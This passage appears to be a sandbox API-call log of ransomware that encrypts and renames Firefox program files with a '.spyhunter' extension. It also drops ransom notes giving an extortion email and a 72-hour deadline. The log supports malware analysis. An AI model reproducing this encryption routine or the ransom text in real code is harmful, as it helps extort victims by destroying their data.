1 [0163.013] CloseHandle (hObject=0x9c) returned 1 [0163.041] GetProcessHeap () returned 0x2c0000 [0163.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.041] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja.spyhunter") returned 60 [0163.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\omni.ja"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\omni.ja.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\omni.ja.spyhunter")) returned 1 [0163.052] GetProcessHeap () returned 0x2c0000 [0163.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.052] GetProcessHeap () returned 0x2c0000 [0163.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0163.052] GetProcessHeap () returned 0x2c0000 [0163.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe670 | out: hHeap=0x2c0000) returned 1 [0163.052] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e750 | out: pbBuffer=0x270e750) returned 1 [0163.052] GetProcessHeap () returned 0x2c0000 [0163.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0163.052] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e748*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e748*=0x30) returned 1 [0163.052] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcp100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0163.053] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll") returned 55 [0163.053] StrStrW (lpFirst="msvcp100.dll", lpSrch=".txt") returned 0x0 [0163.053] GetProcessHeap () returned 0x2c0000 [0163.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0163.053] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e70c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e70c*=0x2800, lpOverlapped=0x0) returned 1 [0163.100] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.100] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e70c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e70c*=0x2800, lpOverlapped=0x0) returned 1 [0163.100] GetProcessHeap () returned 0x2c0000 [0163.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0163.100] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.100] WriteFile (in: hFile=0xb0, lpBuffer=0x270e74c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e70c, lpOverlapped=0x0 | out: lpBuffer=0x270e74c*, lpNumberOfBytesWritten=0x270e70c*=0x4, lpOverlapped=0x0) returned 1 [0163.327] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e70c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e70c*=0x30, lpOverlapped=0x0) returned 1 [0163.327] CloseHandle (hObject=0xb0) returned 1 [0163.327] GetProcessHeap () returned 0x2c0000 [0163.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.327] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll.spyhunter") returned 65 [0163.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcp100.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcp100.dll.spyhunter")) returned 1 [0163.328] GetProcessHeap () returned 0x2c0000 [0163.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.328] GetProcessHeap () returned 0x2c0000 [0163.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0163.328] GetProcessHeap () returned 0x2c0000 [0163.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1088 | out: hHeap=0x2c0000) returned 1 [0163.329] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e750 | out: pbBuffer=0x270e750) returned 1 [0163.329] GetProcessHeap () returned 0x2c0000 [0163.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0163.329] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e748*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e748*=0x30) returned 1 [0163.329] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozjs.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozjs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0163.329] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozjs.dll") returned 52 [0163.330] StrStrW (lpFirst="mozjs.dll", lpSrch=".txt") returned 0x0 [0163.330] GetProcessHeap () returned 0x2c0000 [0163.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0163.330] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e70c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e70c*=0x2800, lpOverlapped=0x0) returned 1 [0163.415] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.415] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e70c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e70c*=0x2800, lpOverlapped=0x0) returned 1 [0163.415] GetProcessHeap () returned 0x2c0000 [0163.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0163.415] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.415] WriteFile (in: hFile=0xb0, lpBuffer=0x270e74c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e70c, lpOverlapped=0x0 | out: lpBuffer=0x270e74c*, lpNumberOfBytesWritten=0x270e70c*=0x4, lpOverlapped=0x0) returned 1 [0163.417] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e70c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e70c*=0x30, lpOverlapped=0x0) returned 1 [0163.417] CloseHandle (hObject=0xb0) returned 1 [0163.767] GetProcessHeap () returned 0x2c0000 [0163.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.767] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozjs.dll.spyhunter") returned 62 [0163.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozjs.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozjs.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozjs.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozjs.dll.spyhunter")) returned 1 [0163.768] GetProcessHeap () returned 0x2c0000 [0163.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.768] GetProcessHeap () returned 0x2c0000 [0163.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0163.768] GetProcessHeap () returned 0x2c0000 [0163.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0fd0 | out: hHeap=0x2c0000) returned 1 [0163.768] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e748 | out: pbBuffer=0x270e748) returned 1 [0163.768] GetProcessHeap () returned 0x2c0000 [0163.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0163.768] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e740*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e740*=0x30) returned 1 [0163.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0163.769] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk") returned 54 [0163.769] StrStrW (lpFirst="freebl3.chk", lpSrch=".txt") returned 0x0 [0163.769] GetProcessHeap () returned 0x2c0000 [0163.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0163.769] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e704, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e704*=0x383, lpOverlapped=0x0) returned 1 [0163.796] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffc7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.796] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x270e704, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e704*=0x383, lpOverlapped=0x0) returned 1 [0163.796] GetProcessHeap () returned 0x2c0000 [0163.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0163.796] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.796] WriteFile (in: hFile=0x9c, lpBuffer=0x270e744*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e704, lpOverlapped=0x0 | out: lpBuffer=0x270e744*, lpNumberOfBytesWritten=0x270e704*=0x4, lpOverlapped=0x0) returned 1 [0163.796] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e704, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e704*=0x30, lpOverlapped=0x0) returned 1 [0163.796] CloseHandle (hObject=0x9c) returned 1 [0163.797] GetProcessHeap () returned 0x2c0000 [0163.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.797] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk.spyhunter") returned 64 [0163.797] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.chk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.chk.spyhunter")) returned 1 [0163.797] GetProcessHeap () returned 0x2c0000 [0163.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.797] GetProcessHeap () returned 0x2c0000 [0163.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0163.798] GetProcessHeap () returned 0x2c0000 [0163.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0a10 | out: hHeap=0x2c0000) returned 1 [0163.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0163.799] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0163.799] WriteFile (in: hFile=0x9c, lpBuffer=0x270e67b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e7a4, lpOverlapped=0x0 | out: lpBuffer=0x270e67b*, lpNumberOfBytesWritten=0x270e7a4*=0x127, lpOverlapped=0x0) returned 1 [0163.800] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0163.800] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e7a4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e7a4*=0x2ac, lpOverlapped=0x0) returned 1 [0163.800] CloseHandle (hObject=0x9c) returned 1 [0163.800] GetProcessHeap () returned 0x2c0000 [0163.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee5a50 | out: hHeap=0x2c0000) returned 1 [0163.800] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e740 | out: pbBuffer=0x270e740) returned 1 [0163.800] GetProcessHeap () returned 0x2c0000 [0163.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0163.800] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e738*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e738*=0x30) returned 1 [0163.801] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.dic" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0163.801] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.dic") returned 65 [0163.801] StrStrW (lpFirst="en-US.dic", lpSrch=".txt") returned 0x0 [0163.801] GetProcessHeap () returned 0x2c0000 [0163.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0163.801] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e6fc*=0x2800, lpOverlapped=0x0) returned 1 [0163.877] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.877] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e6fc*=0x2800, lpOverlapped=0x0) returned 1 [0163.877] GetProcessHeap () returned 0x2c0000 [0163.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0163.877] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.877] WriteFile (in: hFile=0x9c, lpBuffer=0x270e73c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6fc, lpOverlapped=0x0 | out: lpBuffer=0x270e73c*, lpNumberOfBytesWritten=0x270e6fc*=0x4, lpOverlapped=0x0) returned 1 [0164.113] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6fc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e6fc*=0x30, lpOverlapped=0x0) returned 1 [0164.113] CloseHandle (hObject=0x9c) returned 1 [0164.114] GetProcessHeap () returned 0x2c0000 [0164.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.114] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.dic.spyhunter") returned 75 [0164.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.dic" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.dic"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.dic.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.dic.spyhunter")) returned 1 [0164.114] GetProcessHeap () returned 0x2c0000 [0164.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.114] GetProcessHeap () returned 0x2c0000 [0164.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0164.114] GetProcessHeap () returned 0x2c0000 [0164.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06808 | out: hHeap=0x2c0000) returned 1 [0164.115] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e740 | out: pbBuffer=0x270e740) returned 1 [0164.115] GetProcessHeap () returned 0x2c0000 [0164.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0164.115] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e738*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e738*=0x30) returned 1 [0164.115] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\crashreporter-override.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\crashreporter-override.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0164.115] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\crashreporter-override.ini") returned 77 [0164.115] StrStrW (lpFirst="crashreporter-override.ini", lpSrch=".txt") returned 0x0 [0164.115] GetProcessHeap () returned 0x2c0000 [0164.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0164.115] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e6fc*=0x30f, lpOverlapped=0x0) returned 1 [0164.198] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffcf1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.198] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x30f, lpNumberOfBytesWritten=0x270e6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e6fc*=0x30f, lpOverlapped=0x0) returned 1 [0164.199] GetProcessHeap () returned 0x2c0000 [0164.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0164.199] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.199] WriteFile (in: hFile=0x9c, lpBuffer=0x270e73c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6fc, lpOverlapped=0x0 | out: lpBuffer=0x270e73c*, lpNumberOfBytesWritten=0x270e6fc*=0x4, lpOverlapped=0x0) returned 1 [0164.199] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6fc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e6fc*=0x30, lpOverlapped=0x0) returned 1 [0164.199] CloseHandle (hObject=0x9c) returned 1 [0164.199] GetProcessHeap () returned 0x2c0000 [0164.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0164.199] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\crashreporter-override.ini.spyhunter") returned 87 [0164.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\crashreporter-override.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\crashreporter-override.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\crashreporter-override.ini.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\crashreporter-override.ini.spyhunter")) returned 1 [0164.200] GetProcessHeap () returned 0x2c0000 [0164.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0164.200] GetProcessHeap () returned 0x2c0000 [0164.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0164.201] GetProcessHeap () returned 0x2c0000 [0164.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeb2f0 | out: hHeap=0x2c0000) returned 1 [0164.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0164.326] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.326] WriteFile (in: hFile=0xb0, lpBuffer=0x270e66f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e798, lpOverlapped=0x0 | out: lpBuffer=0x270e66f*, lpNumberOfBytesWritten=0x270e798*=0x127, lpOverlapped=0x0) returned 1 [0164.326] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.326] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e798, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e798*=0x2ac, lpOverlapped=0x0) returned 1 [0164.327] CloseHandle (hObject=0xb0) returned 1 [0164.327] GetProcessHeap () returned 0x2c0000 [0164.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeb208 | out: hHeap=0x2c0000) returned 1 [0164.327] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e738 | out: 